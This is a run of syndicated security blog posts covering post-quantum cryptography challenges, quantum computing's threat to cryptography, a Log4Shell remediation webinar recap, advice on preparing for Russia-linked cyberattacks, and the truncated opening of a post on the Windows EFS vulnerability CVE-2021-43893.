The third kingdom deals with the standardization process as done by different bodies of organizations (such NIST or the Internet Engineering Task Force — IETF). We have talked a little about the matter in the previous section as it involves the standardization of both protocols and algorithms. Standardization can be a long process due to the need for careful discussion, and this discussion will be needed for the standardization of post-quantum algorithms. Post-quantum cryptography is based on mathematical constructions that are not widely known by the engineering community, which can then lead to difficulty levels when standardizing.

The challenges in this kingdom, Regulae, (in no particular order) are:

  • The mathematical base of post-quantum cryptography is an active area of development and research, and there are some concerns in the security they give (are there new attacks in the confidentiality or authentication they give?). How will standardization bodies approach this problem?
  • Post-quantum cryptography introduces new models in which to analyze the security of algorithms (for example, the usage of the Quantum Random Oracle Model). Will this mean that new attacks or adversaries will not be noted at the standards level?
  • What will be the recommendation of migrating to post-quantum cryptography from the standards’ perspective: will we use a hybrid approach?
  • How can we bridge the academic/research community into the standardization community, so analysis of protocols are executed and attacks are found on time (prior to being widely deployed)1? How can we make sure that standards bodies are informed enough to make the right practical/theoretical trade-offs?

At Cloudflare, we are closely collaborating with standardization bodies to prepare the path for post-quantum cryptography (see, for example, the AuthKEM draft at IETF).

Challenges at the Community level, Comunitates

The Internet is not an isolated system: it is a community of different actors coming together to make protocols and systems work. Migrating to post-quantum cryptography means sitting together as a community to update systems and understand the different needs. This is one of the reasons why, at Cloudflare, we are organizing a second installment of the PQNet workshop (expected to be colocated with Real World Crypto 2022 on April 2022) for experts on post-quantum cryptography to talk about the challenges of putting it into protocols, systems and architectures.

The challenges in this kingdom, Comunitates, are:

  • What are the needs of different systems? While we know what the needs of different protocols are, we don’t know exactly how all deployed systems and services work. Are there further restrictions?
  • On certain systems (for example, on the PKI), when will the migration happen, and how will it be coordinated?
  • How will the migration be communicated to the end-user?
  • How will we deprecate pre-quantum cryptography?
  • How will we integrate post-quantum cryptography into systems where algorithms are hardcoded (such as IoT devices)?
  • Who will maintain implementations of post-quantum algorithms and protocols? Is there incentive and funding for a diverse set of interoperable implementations?

Challenges at the Research level, Investigationes

Post-quantum cryptography is an active area of research. This research is not devoted only to how algorithms interact with protocols, systems and architectures (as we have seen), but it is heavily interested at the foundational level. The open challenges on this front are many. We will list four that are of the most interest to us:

  • Are there any efficient and secure post-quantum non-interactive key exchange (NIKE) algorithms?

NIKE is a cryptographic algorithm which enables two participants, who know each others’ public keys, to agree on a shared key, without requiring any interaction. An example of a NIKE is the Diffie-Hellman algorithm. There are no efficient and secure post-quantum NIKEs. A candidate seems to be CSIDH, which is rather slow and whose security is debated.

  • Are there post-quantum alternatives to (V)OPRFs based protocols, such as Privacy Pass or OPAQUE?
  • Are there post-quantum alternatives to other cryptographic schemes such as threshold signature schemes, credential based signatures and more?
  • How can post-quantum algorithms be formally verified with new notions such as the QROM?

Post-Quantum Future

The Post-Quantum State: a taxonomy of challenges
The future of Cloudflare is post-quantum.

What is the post-quantum future at Cloudflare? There are many avenues that we explore in this blog series. While all of these experiments have given us some good and reliable information for the post-quantum migration, we further need tests in different network environments and with broader connections. We also need to test how post-quantum cryptography fits into different architectures and systems. We are preparing a bigger, wide-scale post-quantum effort that will give more insight into what can be done for real-world connections.

In this series of blog posts, we will be looking at:

  • What has been happening in the quantum research world in the last years and how it impacts post-quantum efforts.
  • What is a post-quantum algorithm: explanations of KEMs and signatures, and their security properties.
  • How one integrates post-quantum algorithms into protocols.
  • What is formal verification, analysis and implementation, and how it is needed for the post-quantum transition.
  • What does it mean to implement post-quantum cryptography: we will look at our efforts making Logfwdr, Cloudflare Tunnel and Gokeyless post-quantum.
  • What does the future hold for a post-quantum Cloudflare.

See you in the next blogpost and prepare for a better, safer, faster and quantum-protected Internet!

If you are a student enrolled in a PhD or equivalent research program and looking for an internship for 2022, see open opportunities.

If you’re interested in contributing to projects helping Cloudflare, our engineering teams are hiring.

You can reach us with questions, comments, and research ideas at [email protected].

…….

1A success scenario of this is the standardization of TLS 1.3 (in comparison to TLS 1.0-1.2) as it involved the formal verification community, which helped bridge the academic-standards communities to good effect. Read the analysis of this novel process.

The quantum solace and spectre

Post Syndicated from Sofía Celi original https://blog.cloudflare.com/quantum-solace-and-spectre/

The quantum solace and spectre

Not only is the universe stranger than we think, but it is stranger than we can think of
Werner Heisenberg

The quantum solace and spectre

Even for a physicist as renowned as Heisenberg, the universe was strange. And it was strange because several phenomena could only be explained through the lens of quantum mechanics. This field changed the way we understood the world, challenged our imagination, and, since the Fifth Solvay Conference in 1927, has been integrated into every explanation of the physical world (it is, to this day, our best description of the inner workings of nature). Quantum mechanics created a rift: every physical phenomena (even the most micro and macro ones) stopped being explained only by classical physics and started to be explained by quantum mechanics. There is another world in which quantum mechanics has not yet created this rift: the realm of computers (note, though, that manufacturers have been affected by quantum effects for a long time). That is about to change.

In the 80s, several physicists (including, for example, Richard Feynman and Yuri Manin) asked themselves these questions: are there computers that can, with high accuracy and in a reasonable amount of time, simulate physics? And, specifically, can they simulate quantum mechanics? These two questions started a long field of work that we now call “quantum computing”. Note that you can simulate quantum phenomena with classical computers. But we can simulate in a much faster manner with a quantum computer.

Any computer is already a quantum system, but a quantum computer uses the true computational power that quantum mechanics offers. It solves some problems much faster than a classical computer. Any computational problem solvable by a classical computer is also solvable by a quantum computer, as any physical phenomena (such as operations performed in classical computers) can be described using quantum mechanics. Contrariwise, any problem solvable by a quantum computer is also solvable by a classical computer: quantum computers provide no additional power over classical computers in terms of what they could theoretically compute. Quantum computers cannot solve undecidable problems, and they do not disprove the Church–Turing thesis. But, they are faster for specific problems! Let’s explore now why this is the case.

In a classical computer, data is stored in bits: 0 or 1, current on or current off, true or false. Nature is not that binary: any physical bit (current or not; particle or not; magnetized or not) is in fact a qubit and exists on a spectrum (or rather a sphere) of superpositions between 0 and 1. We have mentioned two terms that might be new to the reader: qubit and superposition. Let’s first define the second term.

A superposition is a normalized linear combination of all the possible configurations of something. What is this something? If we take the Schrödinger equation to explain, “for any isolated region of the universe that you want to consider, that equation describes the evolution in time of the state of that region, which we represent as a normalized linear combination — a superposition — of all the possible configurations of elementary particles in that region”, as Aaronson put it. Something, then, refers to all elementary particles. Does it mean, then, that we all are in a superposition? The answer to that question is open to many interpretations (for a nice introduction on the topic, one can read “Quantum Computing Since Democritus” by Scott Aaronson).

As you see, we are concerned then no longer on matter or energy or waves (as in classical physics), but rather on information and probabilities. In a quantum system, we first initialize information (like a bit) to some “easy” states, like 0 and 1. This information will be in a superposition of both states at the same time rather than just one or the other. If we examine a classical bit, we will either get the states of 1 or 0. Instead, with a qubit (quantum information) we can only get results with some probability. A qubit can exist in a continuum of states between ⟨0 and ⟨1 (using Dirac’s notation) all waiting to happen with some probability until it is observed.

The quantum solace and spectre
A qubit stores a combination of two or more states.

In day-to-day life, we don’t see this quantum weirdness because we’re looking at huge jittery ensembles of qubits where this weirdness gets lost in noise. However, if we turn the temperature way down and isolate some qubits from noise, we can do some proper quantum computation. For instance, to find a 256-bit decryption key, we can set 256 qubits to a superposition of all possible keys. Then, we can run the decryption algorithm, trying the key in the qubits. We end up with a superposition of many failures and one success. We did 2256 computations in a single go! Unfortunately, we can’t read out this superposition. In fact, if we open up the quantum computer to inspect the qubits inside, the outside noise will collapse the superposition into one outcome, which will most certainly be a failure. The real art of quantum computing is interfering this superposition with itself in a clever way to amplify out the answer we want. For the case we are talking about, Lov Grover figured out how to do it. Unfortunately, it requires about 2128 steps: we have a nice, but not exponential speed-up.

Quantum computers do not provide any additional power over classical computers in terms of computability: they don’t solve unsolvable problems. But they provide efficiency: they find solutions in faster time, even for algorithms that are too “expensive” for a non-quantum (classical) computer. A classical computer can solve any known computational problem if it is given enough time and resources. But, on some occasions, they will need so much time and so many resources that it will be deemed inefficient to try to solve this problem: waiting millions of years with millions of computers working at the same time trying to solve a problem is not something that we consider feasible to do. This idea of efficient and inefficient algorithms was made mathematically precise by the field of computational complexity. Roughly speaking, an efficient algorithm is one which runs in time polynomial in the size of the problem solved.

We can look at this differently. The many quantum states can be potentially observed (even in a classical computer), but states interfere with each other, which prevents the usage of statistical sampling to obtain the state. We, then, have to track every possible configuration that a quantum system can be in. Tracking every possible configuration is theoretically possible by a classical computer, but would exceed the memory capacity of even the most powerful classical computers. So, we need quantum computers to efficiently solve these problems.

Quantum computers are powerful. They can efficiently simulate quantum mechanics experiments, and are able to perform a number of mathematical, optimization, and search problems in a faster manner than classical computers. A sufficiently scaled quantum computer can, for example, factor large integers efficiently, as was shown by Shor. They also have significant advantages when it comes to searching on unstructured databases or solving the discrete logarithm problem. These advances are the solace: they efficiently advance computational problems that seem stalled. But, they are also a spectre, a threat: the problems that they efficiently solve are what is used as the core of much of cryptography as it exists today. They, hence, can break most of the secure connections we use nowadays. For a longer explanation of the matter, see our past blog post.

The realization of large-scale quantum computers will pose a threat to our connections and infrastructure. This threat is urgent and acts as a spectre of the future: an attacker can record and store secured traffic now and decrypt it later when a quantum computer exists. The spectre is ever more present if one recalls that migrating applications, architectures and protocols is a long procedure. Migrating these services to quantum-secure cryptography will take a lot of time.

In our other blog posts, we talk at length about what quantum computers are and what threats they pose. In this one, we want to give an overview of the advances in quantum computing and their threats to cryptography, as well as an update to what is considered quantum-secure cryptography.

The new upcoming decade of quantum computing

In our previous blog post, we mainly talked about improvements to reduce the cost of factoring integers and computing discrete logarithms during the middle of 2019. But recent years have brought new advances to the field. Google, for example, is aiming to build a “useful, error-corrected quantum computer” by the end of the decade. Their goal is to be able to better simulate nature and, specifically, to better simulate molecules. This research can then be used, for example, to create better batteries or generate better targeted medicines.

Why will it take them (and, generally, anyone) so long to create this quantum computer? Classical mechanisms, like Newtonian physics or classical computers, provide great detail and prediction of events and phenomena at a macroscopic level, which makes them perfect for our everyday computational needs. Quantum mechanics, on the other hand, are better manifested and understood at the microscopic level. Quantum phenomena are, furthermore, very fragile: uncontrolled interaction of quantum phenomena with the environment can make quantum features disappear, a process which is referred to as decoherence. Due to this, measurement of quantum states has to be controlled, properly prepared and isolated from its environment. Furthermore, measuring a quantum phenomenon disturbs its state, so reliable methods of computing information have to be developed.

Creating a computer that achieves computational tasks with these challenges is a daunting one. In fact, it may ultimately be impossible to completely eliminate errors in the computational tasks. It can even be an impossible task at a perfect level, as a certain amount of errors will persist. Reliable computation seems to be only achievable in a quantum computational model by employing error correction.

So, when will we know that a created quantum device is ready for the “quantum” use cases? One can use the idea of “quantum supremacy”, which is defined as the ability for a quantum device to perform a computational task that would be practically impossible (in terms of efficiency and usage of computational power) for classical computers. Nevertheless, this idea can be criticized as classical algorithms improve over time, and there is no clear definition on how to compare quantum computations with their classical counterparts (one must prove that no classical means would allow us to perform the same computational task in a faster time) in order to say that indeed quantum computations of the task are faster.

A molecule can indeed be claimed to be “quantum supreme” if researchers find it computationally prohibitive (unrealistically expensive) to solve the Schrödinger equation and calculate its ground state. That molecule constitutes a “useful quantum computer, for the task of simulating itself.” But, for computer science, this individual instance is not enough: “for any one molecule, the difficulty in simulating it classically might reflect genuine asymptotic hardness, but it might also reflect other issues (e.g., a failure to exploit special structure in the molecule, or the same issues of modeling error, constant-factor overheads, and so forth that arise even in simulations of classical physics)”, as stated by Aaronson and Chen.

By the end of 2019, Google argued they had reached quantum supremacy (with the quantum processor named “Sycamore”) but their claim was debated mainly due to the perceived lack of criteria to properly define when “quantum supremacy” is reached1. Google claimed that “a state-of-the-art supercomputer would require approximately 10,000 years to perform the equivalent task” and it was refuted by IBM by saying that “an ideal simulation of the same task can be performed on a classical system in 2.5 days and with far greater fidelity”. Regardless of this lack of criteria, this result in itself is a remarkable achievement and shows great interest of parties into creating a quantum computer. Last November, it was claimed that the most challenging sampling task performed on Sycamore can be accomplished within one week on the Sunway supercomputer. A crucial point has to be understood on the matter, though: “more like a week still seems to be needed on the supercomputer”, as noted by Aaronson. Quantum supremacy then is still not an irrevocable agreement.

Google’s quantum computer has already been applied to simulating real physical phenomena. Early in 2021, it was used to demonstrate a “time crystal” (a quantum system of particles which move in a regular, repeating motion without burning any energy to the environment). On the other hand, by late 2021, IBM unveiled its 127-qubit chip Eagle, but we don’t yet know how much gate fidelity (how close two operations are to each other) it really attains, as outlined by Aaronson in his blog post.

What do all of these advances mean for cryptography? Does it mean that soon all secure connections will be broken? If not “soon”, when will it be? The answers to all of these questions are complex and unclear. The Quantum Threat Timeline Report of 2020 suggests that the majority of researchers on the subject think that 15 to 40 years2 will be the time frame for when a “cryptography-breaking” quantum computer arrives. It is worth noting that these predictions are more optimistic than compared to the same report of 2019, which suggests that, due to the advances of the quantum computing field, researchers feel more assured of their imminent arrival.

The upcoming decades of breaking cryptography

The quantum solace and spectre

Quantum computing will shine a light into new areas of development and advances, but it will also expose secret areas: faster mechanisms to solve mathematical problems and break cryptography. The metaphor of the dawn can be used to show how close we are to quantum computers breaking some types of cryptography (how far are we to twilight), which will be catastrophic to the needs of privacy, communication and security we have.

It is worth noting again, though, that the advent of quantum computing is not a bad scenario in itself. Quantum computing will bring much progress in the form of advances to the understanding and mimicking of the fundamental way in which nature interacts. Their inconvenience is that they break most of the cryptography algorithms we use nowadays. They also have their limits: they cannot solve every problem, and in cryptography there are algorithms that will not be broken by them.

Let’s start by defining first what dawn is. Dawn is the arrival of stable quantum computers that break cryptography in a reasonable amount of time and space (explicitly: breaking the mathematical foundation of the p256 algorithm; although some research defines this as breaking RSA2048). It is also the time by which a new day arrives: a day that starts with new advances in medicine, for example, by better mimicking molecules’ nature with a computer.

How close to dawn are we? To answer this question, we have to look at the recent advances in the aim of breaking cryptography with a quantum computer. One of the most interesting advances is that the number 15 was factored in 2001 (it is 20 years already) and number 21 was factored in 2012 by a quantum computer. While this does not seem so exciting for us (as we can factor it in our minds), it is astonishing to see that a quantum computer was stable enough to do so.

Why do we care about computers factoring or not factoring integers? The reason is that they are the mathematical base of certain public key cryptography algorithms (like, RSA) and, if they are factored, the algorithm is broken.

Taking a step further, quantum computers are also able to break encryption algorithms themselves, such as AES, as we can use quantum efficient searching algorithms for the task. This kind of searching algorithm, Grover’s algorithm, solves the task of function inversion, which speeds up collision and preimage attacks (attacks that you don’t want to be sped up in your encryption algorithms). These attacks are related to hash functions: a collision attack is one that tries to find two messages that produce the same hash; a preimage attack is one that tries to find a message given its hash value. A smart evolution of this algorithm, using Hidden Variables as part of a computational model, will theoretically make searching much more efficient.

So what are the tasks needed for a quantum computer to break cryptography? It should:

  • Be able to factor big integers, or,
  • Be able to efficiently search for collisions or pre-images, or,
  • Be able to solve the discrete logarithm problem.

Why do we care about these quantum computers breaking cryptographic algorithms that we rarely hear of? What has it to do with the connections we make? Cryptographic algorithms are the base of the secure protocols that we use today. Every time we visit a website, we are using a broad suite of cryptographic algorithms that preserve the security, privacy and integrity of connections. Without them, we don’t have the properties we are used to when connecting over digital means.

What can we do? Do we now stop using digital means altogether? There are solutions. Of course, the easy answer will be, for example, to increase the size of integers to make them impossible to be factored by a quantum computer. But, is it really a usable algorithm? How slow will our connections be if we have to increase these algorithms exponentially?

As we get closer to twilight, we also get closer to the dawn of new beginnings, the rise of post-quantum cryptography.

The rise and state of post-quantum cryptography

As dawn approaches, researchers everywhere have been busy looking for solutions. If the mathematical underpinnings of an algorithm are what is broken by a quantum computer, can we just change them? Are there mathematical problems that are hard even for quantum computers? The answer is yes and, even more interestingly, we already know how to create algorithms out of them.

The mathematical problems that we use in this new upcoming era, called post-quantum, are of many kinds:

  • Lattices by using learning with errors (LWE) or ring learning with errors problems (rLWE).
  • Isogenies, which rely on properties of supersingular elliptic curves and supersingular isogeny graphs.
  • Multivariate cryptography, which relies on the difficulty of solving systems of multivariate equations.
  • Code-based cryptography, which relies on the theory of error-correcting codes.

With these mathematical constructions, we can build algorithms that can be used to protect our connections and data. How do we know, nevertheless, that the algorithms are safe? Even if a mathematical construction that an algorithm uses is safe from the quantum spectre, is the interaction with other parts of the system or in regard to adversaries safe? Who decides on this?

Because it is difficult to determine answers to these questions on an isolated level, the National Institute of Standards and Technology of the United States has been running, since 2016, a post-quantum process that will define how these algorithms work, their design, what properties they provide and how they will be used. We now have a set of finalists that are close to being standardized. The competition standardizes on two tracks: algorithms for key encapsulation mechanisms and public-key encryption (or KEMs) and algorithms for the authentication (mainly, digital signatures). The current finalists are:

For the public-key encryption and key-establishment algorithms:

  • Classic McEliece, a code-based cryptography scheme.
  • CRYSTALS-KYBER, a lattice based scheme.
  • NTRU, a lattice based scheme.
  • SABER, a lattice based scheme.

For the digital signature algorithms:

  • CRYSTALS-DILITHIUM, a lattice based scheme.
  • FALCON, a lattice based scheme.
  • Rainbow, a multivariate cryptography scheme.

What do these finalists show us? It seems that we can rely on the security given by lattice-based schemes (which is no slight to the security of any of the other schemes). It also shows us that in the majority of the cases, we prioritize schemes that can be used in the same way cryptography is used nowadays: with fast operations’ computation time, and with small parameters’ sizes. In the migration to post-quantum cryptography, it is not only about using safe mathematical constructions and secure algorithms but also about how they integrate into the systems, architectures, protocols, and expected speed and space efficiencies we currently depend on. More research seems to be needed in the signatures/authentication front and the inclusion of new innovative signature schemes (like SQISign or MAYO), and that is why NIST will be calling for a fourth round of its competition.

It is worth noting that there exists another flavor of upcoming cryptography called “quantum cryptography”, but its efficient dawn seems to be far away (though, some Quantum Key Distribution — QKD — protocols are being deployed now). Quantum cryptography is one that uses quantum mechanical properties to perform cryptographic tasks. It has mainly focused on QKD), but it seems to be too inefficient to be used in practice outside very limited settings. And even though, in theory, these schemes should be perfectly secure against any eavesdropper; in practice, the physical machines may still fall victim to side-channel attacks.

Is dawn, then, the collapse of cryptography? It can be, on one hand, as it is the collapse of most classical cryptography. But, on the other hand, it is also the dawn of new, post-quantum cryptography and the start of quantum computing for the benefit of the world. Will the process of reaching dawn be simple? Certainly, not. Migrating systems, architectures and protocols to new algorithms is an intimidating task. But we at Cloudflare and as a community are taking the steps, as you will read in other blog posts throughout this week.

References:

…….
1In the original paper, they estimate of 10,000 years is based on the observation that there is not enough Random Access Memory (RAM) to store the full state vector in a Schrödinger-type simulation and, then, it is needed to use a hybrid Schrödinger–Feynman algorithm, which is memory-efficient but exponentially more computationally expensive. In contrast, IBM used a Schrödinger-style classical simulation approach that uses both RAM and hard drive space.
2There is a 50% or more likelihood of “cryptography-breaking” quantum computers arriving. Slightly more than half of the researchers answered that, in the next 15 years, they will arrive. About 86% of the researchers answered that, in the next 20 years, they will arrive. All but one among the researchers answered that, in the next 30 years, they will arrive.
3Although, in practice, this seems difficult to attain.

Log4Shell 2 Months Later: Security Strategies for the Internet’s New Normal

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/

Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal

CVE-2021-44228 rules everything around us — or so it seemed, at least, for those breathless days in December 2021 when the full scope of Log4Shell was starting to take hold and security teams were strapped for time and resources as they scoured their organizations’ environments for vulnerable instances of Apache Log4j. But now that the peak intensity around this vulnerability has waned and we’ve had a chance to catch our collective breath, where does the effort to patch and remediate stand? What should security teams be focusing on today in the fight against Log4Shell?

On Wednesday, February 16, Rapid7 experts Bob Rudis, Devin Krugly, and Glenn Thorpe sat down for a webinar on the current state of the Log4j vulnerability. They covered where Log4Shell stands now, what the future might hold, and what organizations should be doing proactively to ensure they’re as protected as possible against exploits.

Laying out the landscape

Glenn Thorpe, Rapid7’s Program Manager for Emergent Threat Response, kicked things off with a recap and retrospective of Log4Shell and why it seemingly set fire to the entire internet for a good portion of December. The seriousness of this vulnerability is due to the coming-together of several key factors, including:

  • The ability for vulnerable systems to grant an attacker full administrative access
  • The low level of skill required for exploitation — in many cases, attackers simply have to copy and paste
  • The attack vector’s capability to run undetected over an encrypted channel
  • The pervasiveness of the Log4j library, which means vulnerability scanners alone can’t act as complete solutions against this threat

Put all this together, and it’s no surprise that the volume of exploit attempts leveraging the Log4j vulnerability ramped up throughout December 2021 and has continued to spike periodically throughout January and February 2022. By January 10, ransomware using Log4Shell had been observed, and on January 14, Rapid7’s MDR saw mass Log4j exploits in VMware products.

But while there’s certainly been plenty of Log4j patching done, the picture on that front is far from complete. According to the latest CISA data (also here as a daily-updated spreadsheet), there are still 320 cataloged software products that are known to be affected by vulnerable Log4j as of February 16, 2022 — and 1,406 still awaiting confirmation from the vendor.



Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal

Log4j today: A new normal?

So, where does the effort to put out Log4j fires stand now? Devin Krugly, Rapid7’s Practice Advisor for Vulnerability Risk Management, thinks we’re in a better spot than we were in December — but we’re by no means out of the woods.

“We’re effectively out of fire-fighting mode,” said Devin. That means that, at this point, most security teams have identified the affected systems, implemented mitigations, and patched vulnerable versions of Log4j. But because of the complexity of today’s software supply chains, there are often heavily nested dependencies within vendor systems — some of which Log4j may still be implicated in. This means it’s essential to have a solid inventory of vendor software products that may be using Log4j and to ensure those instances of the library are updated and patched.

“Don’t lose that momentum,” Glenn chimed in. “Don’t put that on your post-mortem action list and forget about it.”

This imperative is all the more critical because of a recent uptick in Log4Shell activity. Rapid7’s Chief Data Scientist Bob Rudis laid out some activity detected by the Project Heisenberg honeypot fleet indicating a revival of Log4j activity in early and mid-February, much of it from new infrastructure and scanning hosts that hadn’t been seen before.

Amid this increase in activity, vulnerable instances of Log4j are anything but gone from the internet. In fact, data from Sonatype as of February 16, 2022 indicates 39% of Log4j downloads are still versions vulnerable to Log4Shell.

“We’re going to be seeing Log4j attempts on the internet, on the regular, at a low level, forever,” Bob said. Log4Shell is now in a family with WannaCry and Conficker (yes, that Conficker) — vulnerabilities that are around indefinitely, and which we’ll need to continually monitor for as attackers use them to try to breach our defenses.

Adopting a defense-in-depth posture in the “new normal” of life with Log4Shell is sure to come with its share of headaches. Luckily, Bob, Devin, and Glenn shared some practical strategies that security teams can adopt to keep their organizations’ defenses strong and avoid some common pitfalls.

Go beyond compensating controls

“My vendor says they’ve removed the JNDI class from the JAR file — does that mean their application is no longer vulnerable to Log4Shell?” This question came up in a few different forms from our webinar audience. The answer from our panelists was nuanced but crystal-clear: maybe for now, but not forever.

Removing the JNDI class is a compensating control — one that provides a quick fix for the vulnerability but doesn’t patch the core, underlying problem via a full update. For example, when you do a backup, you might unknowingly reintroduce the JNDI class after removing it — or, as Devin pointed out, an attacker could chain together a replacement for it.

These kinds of compensating or mitigating controls have their place in a short-term response, but there’s simply no action that can replace the work of upgrading all instances of Log4j to the most up-to-date versions that contain patches for Log4Shell.

“Mitigate for speed, but not in perpetuity,” Glenn recommended.

Find the nooks and crannies

Today’s cloud-centric IT environments are increasingly ephemeral and on-demand — a boost for innovation and speed, but that also means teams can deploy workloads without security teams ever knowing about it. Adopting an “Always Be Scanning” mindset, as Bob put it, is essential to ensure vulnerable instances of Log4j aren’t introduced into your environment.

Continually scanning your internet-facing components is a good and necessary start — but the work doesn’t end there. As Devin pointed out, finding the nooks and crannies where Log4j might crop up is critical. This includes scouring containers and virtual machines, as well as analyzing application and server logs for malicious JNDI strings. You should also ensure your security operations center (SOC) team can quickly and easily identify indicators that your environment is being scanned for reconnaissance into Log4Shell exploit opportunities.

“Involving the SOC team for alerting purposes, if you haven’t already done that, is an absolutely necessity in this case,” said Devin.

Get better at vendor management

It should be clear by now that in a post-Log4j world, organizations must demand the highest possible level of visibility into their software supply chain — and that means being clear, even tough, with vendors.

“Managing stuff on the internet is hard because organizations are chaotic beings by nature, and you’re trying to control the chaos as a security professional,” said Bob. Setting yourself up success in this context means having the highest level of vulnerability possible. After all, how many other vulnerabilities just as bad as Log4Shell — or even worse — might be out there lurking in the corners of your vendors’ code?

The upcoming US government requirements around Software Bill of Materials (SBOM) for vendor procurement should go a long way toward raising expectations for software vendors. Start asking vendors if they can produce an SBOM that details remediation and update of any vulnerable instances of Log4j.

These conversations don’t need to be adversarial — in fact, vendors can be a key resource in the effort to defend against Log4Shell. Especially for smaller organizations or under-resourced security teams, relying on capable third parties can be a smart way to bolster your defenses.

Only you can secure the software supply chain

OK, maybe that subhead is not literally true — a secure software supply chain is a community-wide effort, to which we must all hold each other accountable. The cloud-based digital ecosystem we all inhabit, whether we like it or not, is fundamentally interconnected. A pervasive vulnerability like Log4Shell is an unmistakable reminder of that fact.

It also serves as an opportunity to raise our expectations of ourselves, our organizations, and our partners — and those choices do start at home, with each security team as they update their applications, continually scan their environments, and demand visibility from their vendors. Those actions really do help create a more secure internet for everyone.

So while we’ll be living with Log4Shell probably forever, it’ll be living with us, too. And as scared as you are of the spider, it’s even more scared of your boot.

Want to go more in-depth? Check out the full replay of our webinar, “Log4Shell Two Months Later: Lessons and Insights for Protectors.”

Quick resources:

Bob, Devin, and Glenn mentioned a wealth of handy links in their discussion. Here are those resources for quick, easy reference.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict

Post Syndicated from boB Rudis original https://blog.rapid7.com/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/

Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict

Tensions between Russia and Ukraine remain elevated, with a high degree of uncertainty surrounding the likelihood of military conflict and its aftermath. As the US Cybersecurity and Infrastructure Agency (CISA) noted in a recent statement on these circumstances, while “​​there are not currently any specific credible threats to the US homeland,” there is the “potential for the Russian government to consider escalating its destabilizing actions in ways that may impact others outside of Ukraine.”

Heightened risk

There are reports that Russia is leveraging offensive cyber capabilities as the situation between Russia and Ukraine escalates. If the situation draws closer to conflict, these actions may also extend to potential retaliatory cyberattacks, or cyberattack campaigns, against critical physical and cyber infrastructure within countries that provide support to Ukraine. This may seem alarmist, but US and other Western entities have been under considerable attack from Russian-affiliated hacking groups for years. Government officials have long reported that such activities are supported or, at best, overlooked by the Russian government, and commentators and researchers have suggested this helps advance Russia’s political agenda. In June 2021, the sustained high level of these attacks against US critical infrastructure resulted in the US President Biden addressing the matter directly with Russia’s President Putin.

Moreover, events like NotPetya and Conficker have shown us that targeting in cyberspace is rarely precise, and collateral damage from cyberattacks can spread far beyond the original target.

Given the increased risk of damage from cyberattacks — whether a direct attack against Ukraine and its supporters or an indirect effect from an attack — it is prudent, as CISA notes, that “all organizations — regardless of size — adopt a heightened posture when it comes to cybersecurity and protecting their most critical assets” and business processes.

The following actions are highly recommended for all organizations. These practices should be taken even in the absence of a geopolitical conflict — threats to organizational cybersecurity were present before the recent Ukraine-Russian tensions and will be present afterwards.

Preparation for direct cyberattack

Fending off an attack from a well-resourced nation state is a nightmare scenario for most cybersecurity teams. However, there are some fundamental steps your organization can take to reduce both the likelihood of becoming a target, the severity of the damage, and the chances of success for an attacker.

CISA’s Shields Up advisory itemizes many steps that are sound practices to defend against any potential cyberattack, and we encourage all organizations to review each of them as part of their preparation plans.

Fundamentally, the guidance comes down to ensuring you have:

  • Safe and resilient configurations in your external internet and cloud asset and application deployments
  • Visibility into processes and network activity across all components of critical business functions
  • A well-tested incident response process in place to respond quickly and effectively to all cyber incursions

If your organization currently works with Ukrainian organizations, we echo CISA’s guidance to take extra care to monitor, inspect, and isolate traffic from those organizations and closely review access controls for that traffic.

US organizations should also keep CISA’s contact information (located at the end of their report) handy in both digital and physical form (in the event you cannot access digital assets) so you can engage them or the FBI in the event you are the victim of a direct cyberattack.

Preparation for cyber critical infrastructure attack

As noted, Russia is a very capable cyber adversary, but they cannot attack every asset/organization individually, all at once. There is a greater likelihood for larger-scale disruption or damage through the targeting of digital resources and Internet services that many people and organizations rely on.

Such attacks could take many forms, such as:

  • Denial of Service (DoS) attacks against central/large DNS and other “internet plumbing services” providers (remember the DynDNS DoS attack that brought down Twitter and many other sites back in 2016), which could result in loss of access to both your web- and app-based client-facing resources and your access to any Sofware-as-a-Service (SaaS) offerings, such as Salesforce, Concur, Zendesk, DocuSign, and other widely-used services.
  • DoS attacks against cloud business suite providers, such as Google Workspace or Microsoft 365, which could disrupt critical business communications for a period of time.
  • Extended DoS and targeted ”destructionware” attacks, which could prevent the operation of services and execution of key business processes. Like NotPetya and Olympic Destroyer, destructionware aims to — via encryption or deletion — destroy the capabilities of the machines it infects.
  • Large-scale DoS attacks against critical network routing segments, and mass BGP hijacking campaigns.

Now would be a good time to itemize all the third-party dependencies in your critical business processes and to draft a plan for ensuring continuity of these processes if each of those services became unavailable for some period of time. It would also be prudent to start identifying alternate providers for each service component and drafting rapid migration plans for each.

For the network-level attacks mentioned above, there isn’t much you can do when it comes to centralized network point DoS, but you can help increase your resilience to BGP hijacking by implementing safe BGP practices and encouraging your business partners and ISPs to do the same.

If tensions become seriously strained, there is a non-zero (but likely very low) chance of direct cyberattacks aimed at causing damage to US and allied physical infrastructure. The US alone has a large number of critical infrastructure facilities — many of which are privately owned — that are still in the process of strengthening their cybersecurity defenses and capabilities. This includes entities that all businesses rely on, such as electricity providers, emergency health services, transportation, and financial institutions.

Acknowledging the relatively low likelihood but high impact of a crippling cyberattack, now would be a good time to review and update (as necessary) your business continuity and disaster recovery (BC/DR) plans and playbooks, and perhaps run an exercise (or two!) that involves loss of one or more critical infrastructure components.

Don’t panic

While there is cause for concern and preparation, there is no cause for panic or overreaction. It is, however, very appropriate to take some time to review your security posture, understand this heightened threat level, and engage stakeholders in an assessment of if — and how — you should proceed to shore up any areas that have gaps.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

Dropping Files on a Domain Controller Using CVE-2021-43893

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/

Dropping Files on a Domain Controller Using CVE-2021-43893

On December 14, 2021, during the Log4Shell chaos, Microsoft published CVE-2021-43893, a remote privilege escalation vulnerability affecting the Windows Encrypted File System (EFS). The vulnerability was credited to James Forshaw of Google Project Zero, but perhaps owing to the Log4Shell atmosphere, the vulnerability gained little to no attention.

On January 13, 2022, Forshaw tweeted about the vulnerability.

Dropping Files on a Domain Controller Using CVE-2021-43893

